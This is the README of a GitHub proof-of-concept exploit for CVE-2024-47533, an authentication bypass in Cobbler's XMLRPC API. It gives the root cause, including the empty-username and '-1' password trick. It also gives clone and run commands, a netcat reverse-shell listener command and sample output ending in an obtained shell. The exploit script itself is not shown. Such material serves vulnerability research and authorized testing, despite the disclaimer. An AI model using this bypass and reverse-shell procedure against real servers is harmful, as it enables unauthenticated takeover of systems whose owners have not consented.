
This repository contains a Proof-of-Concept (PoC) exploit for CVE-2024-47533,
a critical authentication bypass in Cobbler's XMLRPC API that leads to unauthenticated remote code execution (RCE).
The exploit leverages the XMLRPC API's login() method flaw to bypass authentication and inject a reverse shell command via background_import().
This tool is intended for educational, research, and authorized penetration testing only.
Do NOT use it on systems you do not own or have explicit written permission to test.
The author assumes no liability for misuse or damages.
Root Cause:
utils.get_shared_secret() incorrectly returns -1 due to mishandling file reads in binary mode with an encoding, allowing authentication with an empty username and -1 as the password.
Impact:
An attacker can:
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
On your attacking machine:
nc -lvnp 4444
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
Example:
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
.
├── CVE-2024-47533.py # Reverse shell exploit script
└── README.md # Documentation
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.
00xCanelo
GitHub Profile